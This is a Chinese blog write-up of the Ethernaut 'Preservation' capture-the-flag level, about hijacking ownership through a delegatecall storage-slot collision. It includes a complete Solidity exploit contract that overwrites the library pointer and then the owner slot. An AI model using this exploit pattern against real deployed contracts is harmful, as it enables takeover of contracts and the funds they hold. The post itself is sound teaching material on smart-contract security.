ethernaut——Preservation

最新推荐文章于 2024-06-27 14:57:01 发布
最新推荐文章于 2024-06-27 14:57:01 发布
阅读量158 收藏
点赞数
分类专栏: ethernaut_2023详解 文章标签: 区块链 智能合约 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130815177
版权

第十六关:Preservation

本关知识点:

1. delegatecall调用
2. 合约变量的存储
3. uint256和address的类型转换

1. 题目要求

尝试取得合约的所有权(owner)。

2. 代码功能解读

请添加图片描述

3. 漏洞分析

通过delegatecall更改调用者合约的参数。
	1. uint的大小是256位,address的大小是160位,我们把address伪装为uint,然后传入setFirstTime方法,将timeZone1Library变量设置为自己的地址。
	2. 在攻击合约中将"setTime(uint256)"方法设置为修改第四个槽位的值为玩家的地址。

4. 攻击方法

contract Exploit {

  Preservation pres;

  address solt1;

  address solt2;

  // uint256 solt3;

  constructor(address addr) {

    pres = Preservation(addr);

  }

  

  function attack()public {

    uint256 time = uint256(uint160(address(this)));

    pres.setFirstTime(time);

    require(pres.timeZone1Library() == address(this), "error attack");

    uint256 owner = uint256(uint160(address(msg.sender)));

    pres.setFirstTime(owner);

    require(pres.owner() == msg.sender, "error owner");

  }

    function setTime(uint _player) public {

    solt2 = address(uint160(_player));

  }

}

5. 攻击调用图

请添加图片描述
请添加图片描述

6. 知识点分析

在编写智能合约的时候,一定要对自己调用的方法有了解,特别是delegatecall这种不会切换上下文环境的方法,一定要仔细,方式覆盖状态变量。

如果对大家有用,请点赞;如果喜欢,请订阅加点赞,会一直更新~

陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ethernaut靶场实践(三)
m0_68764244的博客
10-10 1168
首先他要我们前十六位全为我们自己的地址,我们将自己的地址直接转换就可以了,第17-32位全为零,由于uint强转是从后面取,也就是十六进制的第9-12位全为零,而1-8位不全为零,因此我们构造出一个Bytes8的数据,并跟我们的数据进行与运算,即可满足要求。随后调用,然后一步步找到剩余的gas,我们需要找到区块链浏览器中的第二个gas操作,并取该gas-2的值,因为gasleft本身也会消耗gas,再与8191进行mod运算,在初始gas处减少响应的结果,重复2-3次,即可成功,提交实例,攻击完成。
Latex——论文翻译
Orthrus19的博客
01-03 1450
美赛论文翻译注意事项,用于自己学习,便于查找
ethernaut
qq_41578716的博客
01-03 1028
首先,准备工作 1、下载好matemask获取免费的测试以太网,大佬告诉本菜说可以点击matemask以太币不够可以重新申请一个账号(放心现在申请肯定不会很麻烦一键式操作)之后点击存入—获取,之后狂点获取按钮。 2、你需要懂智能合约的基础,以及web3.js和操作码的执行方式(当然懂了合约也可以慢慢的做下去,毕竟这个靶场就是给人熟悉合约以及其漏洞的) 0.Hello Ethernaut 这个级别目...
Ethernaut 靶场刷题(下)
feng的博客
04-16 1527
Gatekeeper Two 又学到了新东西。源码: pragma solidity ^0.6.0; contract GatekeeperTwo { address public entrant; modifier gateOne() { require(msg.sender != tx.origin); _; } modifier gateTwo() { uint x; assembly { x := extcodesize(caller()) }
Fossil Preservation
weixin_30808575的博客
05-15 325
Fossil Preservation When one considers the many ways by which organisms are completely destroyed after death, it is remarkable that fossils are as common as they are. Attack by scavengers and bacteri...
Height Preservation Kattis - heightpreservation
七九河开的博客
06-21 284
题目 https://cn.vjudge.net/problem/Kattis-heightpreservation 题意 给你个图,为你改变高度后但不改变相对高低 问有的最小高度为多少 思路 思维 排序后一个点一个点贪心 #include <bits/stdc++.h> #define rep(i,a,b) for(ll i = (a);i <= (b);i++)...
增量学习——文章汇总
Chris_zhangrx的博客
12-27 3312
Workshops Continual learning workshop NeurIPS 2018 Papers 2018 Memory Replay GANs: learning to generate images from new categories without forgetting (NIPS2018) [paper] [code] Rotate your Networks:...
微服务应用——Eureka
CDZAllier的博客
05-17 388
微服务 单体应用架构: 特点:体积庞大,部署时间长,技术更新慢,不利于扩展 微服务架构: 特点: 整个系统由一系列独立运行的微服务组成 每个微服务只关注特定的业务 微服务之间通过RestFul接口进行调用 微服务可以使用不同的技术,独立,独立部署 组件: 整合Netflix的开源组件: Eureka 服务治理组件 Ribbon 客户端负载均衡组件 Hystrix 容错管理组件 Feign 声明式服务调用组件 Zuul 服务网关组件 Config 分布式配置中心(自带的) E
preservation:通用航空项目2
03-21
保存使用的技术-HTML -Milligram框架-EJS -JavaScript -MongoDB -Mongoose -Node.js -Express.js该程序的目的是创建一个允许用户手动上传需要保存的设备的应用程序。要添加的新功能:-将“保存说明”分解为以下部分...
数字遗产:保护新西兰早期电子游戏的法律障碍-研究论文
06-09
国家图书馆、博物馆和档案馆传统上为子孙后代保存非数字文化实体,并得到法律的支持,允许他们为了公共利益凌驾于文化作品所有者的合法权利之上。 由于当今大部分文化材料和信息都是以数字方式创建的,因此正在敦促...
基于边缘保留的CT图像噪声抑制研究-研究论文
05-19
增强图像质量是从医学图像访问更准确信息的重要因素之一。 因此,本文着重于在小波域中使用阈值化技术在计算机断层扫描(CT)图像上使用降噪进行边缘保留。 将现有方案与类似方案和最新方案进行比较,并将结果与​​...
dbptk-ui:台式机和企业版的DBPTK基本UI
04-16
数据库保存工具包企业版/台式机 以前称为数据库可视化工具包 用于关系数据库的轻量级Web查看器,尤其是保留在SIARD 2中的浏览器,该浏览器使用SOLR作为后端,并允许浏览,搜索和导出。 它使用来处理SIARD2格式或原始...
dbptk-enterprise:使用Docker的DBPTK Enterprise部署
04-12
通过Docker安装DBPTK Enterprise Docker将部署为Web应用程序。 部署(默认情况下,CAS身份验证处于禁用状态) 我们建议您在Linux上使用docker。 Windows上的Docker将要求您编辑docker-compose.yaml并将配置路径./...
S-Clustr(影子集群)V3 高并发,去中心化,多节点控制
06-25 733
去中心化分布式节点网络控制器,自主编写客户端后门程序来反向连接到S-Clustr进行上百万设备大规模集群控制
【转型Web3开发第一课】图文版 | 05 | Web3的组成架构
Keegan小钢
06-26 653
上周末,我完成了一场直播课,「**转型Web3开发第一课**」。之后几天,把这第一课的内容进行了拆分,重新录制成了 7 个较短的视频,陆续发布到了B 站、视频号、抖音、知乎等平台。这是图文版的第五篇
创新前沿:Web3如何颠覆传统计算机模式
weixin_44672358的博客
06-27 1039
作为科技创新的前沿,Web3技术正在全球范围内推动着数字经济和社会变革。通过去中心化、数据主权和智能合约等特性,Web3不仅为传统计算机模式带来了颠覆性的改变,也为全球科技创新开辟了新的可能性和机遇。
借助TheGraph 查询ENS信息
techdashen的博客
06-24 860
TheGraph 是一个去中心化的查询协议,在 Web3 领域扮演着非常重要的角色。函数,该函数构造GraphQL查询,发送HTTP POST请求到The Graph的API端点,并解析响应。TheGraph 可以说是 Web3 应用开发的基础设施之一,极大地提高了区块链数据的可访问性和可用性。页面信息可以在这里查到: https://app.ens.domains/vitalik.eth。总ENS 是 Web3 生态中重要的一环,它在提高用户体验、统一身份标识等方面发挥着关键作用。
网络治理新模式:Web3时代的社会价值重构
最新发布
Roun3的博客
06-27 670
Web3技术的出现不仅仅是互联网技术的进步,更是对社会治理模式和价值观念的革新和重构。通过去中心化、数据主权和社区治理等特性,Web3时代正在推动社会治理的民主化、透明化和平等化进程,为全球范围内的社会进步和发展注入了新的动力和可能性。​。
enable-self-preservation
04-06
"enable-self-preservation"的意思是启用自我保护(机制)。在计算机领域中,这通常指系统或软件具备自我防御和恢复的能力,以应对潜在的威胁或故障。这种机制可以让系统在遇到异常情况时自动诊断和修复问题,提高系统的可靠性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值